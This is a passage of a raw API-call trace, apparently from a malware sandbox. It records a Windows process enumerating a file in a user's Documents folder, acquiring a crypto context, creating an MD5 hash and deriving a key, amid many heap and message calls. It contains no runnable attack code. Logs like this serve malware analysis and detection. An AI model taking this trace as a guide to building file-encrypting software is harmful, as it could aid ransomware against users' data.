| out: lpMsg=0x87f154) returned 0 [0179.204] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.204] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x820ae690, ftCreationTime.dwHighDateTime=0x1d5dced, ftLastAccessTime.dwLowDateTime=0xd1f6a5e0, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0xd1f6a5e0, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0x5d90, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="izNb7DZLOKQSO_3S.pps", cAlternateFileName="IZNB7D~1.PPS")) returned 0x90ae18 [0179.204] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0179.204] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.204] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.204] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.204] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0179.204] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.204] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0179.204] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.204] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.205] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0179.205] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.205] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.205] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.205] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.205] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.205] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0179.205] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.205] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0179.206] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.206] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.206] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0179.206] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.206] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.206] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.206] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.206] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.206] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.206] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.206] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.206] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.206] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.206] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.206] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.206] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0179.206] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.206] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.206] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.207] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.207] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.207] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.207] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.207] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.207] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.207] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.207] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.207] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.207] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.207] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.207] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.207] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.207] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0179.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.207] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0179.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.207] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.207] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.208] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.209] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.210] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0179.210] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.210] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.210] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.210] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.210] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 